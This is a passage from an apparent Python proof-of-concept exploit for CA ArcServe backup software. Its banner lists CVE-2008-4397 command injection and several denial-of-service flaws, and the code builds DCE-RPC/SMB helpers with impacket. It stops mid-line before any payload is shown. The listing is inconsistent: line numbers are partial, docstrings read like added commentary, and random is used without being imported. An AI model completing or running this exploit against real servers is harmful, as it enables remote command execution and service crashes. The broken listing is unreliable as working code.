4 | import sys
5 |
6 | from struct import pack
7 |
8 | from impacket.dcerpc import transport, dcerpc
9 | from impacket import uuid, smb
10 |
11 |
# Banner: the ArcServe advisories this PoC covers and who reported them.
print("\n".join([
    "CA ArcServe Exploit",
    "",
    "References",
    "",
    "CVE-2008-4397 - Message engine command injection",
    "CVE-2008-4398 - Tape engine denial of service",
    "CVE-2008-4399 - Database engine denial of service",
    "CVE-2008-4400 - Multiple service crash",
    "",
    "Acknowledgement",
    "",
    "CVE-2008-4397 - Haifei Li of Fortinet's FortiGuard Global Security Research Team",
    "CVE-2008-4398 - Vulnerability Research Team of Assurent Secure Technologies, a TELUS Company",
    "CVE-2008-4399 - Vulnerability Research Team of Assurent Secure Technologies, a TELUS Company",
    "CVE-2008-4400 - Greg Linares of eEye Digital Security",
    "",
    "Exploit URL : http://crackinglandia.blogspot.com/2009/10/el-colador-de-ca-computer-associates.html",
    "",
]))
30 |
31 |
32 |
def get_hostname(ip):
    """Return the server name the SMB service at *ip* reports.

    Connects with the wildcard "*SMBSERVER" NetBIOS name; any connection
    error raised by impacket propagates to the caller.
    """
    conn = smb.SMB("*SMBSERVER", ip)
    name = conn.get_server_name()
    return name
36 |
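def make_random_string(size):
    """Return *size* pseudo-random ASCII alphanumeric characters.

    The callers are not in this excerpt, but by name this is filler for
    protocol strings, so the non-cryptographic ``random`` module is
    adequate; do not reuse it for anything security-sensitive.

    The original rejection-sampled ``randint(0x30, 0x7a)`` with exclusive
    upper bounds (``< 0x39``, ``< 0x5a``, ``< 0x7a``), which silently
    dropped '9', 'Z' and 'z' and looped on every punctuation hit. Drawing
    directly from the full alphanumeric set is unbiased and loop-free.

    Args:
        size: number of characters wanted; zero or negative gives "".
    """
    alphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    return "".join(random.choice(alphabet) for _ in range(max(size, 0)))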
44 |
def pack_ndr_string(Str):
    """Encode *Str* as a NUL-terminated NDR string.

    Emits three longs (the terminated length, zero, the terminated length
    again -- which looks like NDR's max-count / offset / actual-count
    header, TODO confirm), then the terminated bytes, then whatever
    ``align_ndr_string`` returns as padding for them.
    """
    terminated = Str + "\x00"
    count = pack_ndr_long(len(terminated))
    return count + pack_ndr_long(0) + count + terminated + align_ndr_string(terminated)
49 |
def pack_ndr_byte(Str):
    """Return *Str* (an int in 0..255, despite the name) as one raw byte.

    ``struct`` raises ``struct.error`` for values outside the byte range.
    """
    return pack("<B", Str)
52 |
53 | def pack_ndr_long(Str):
54 | return pack("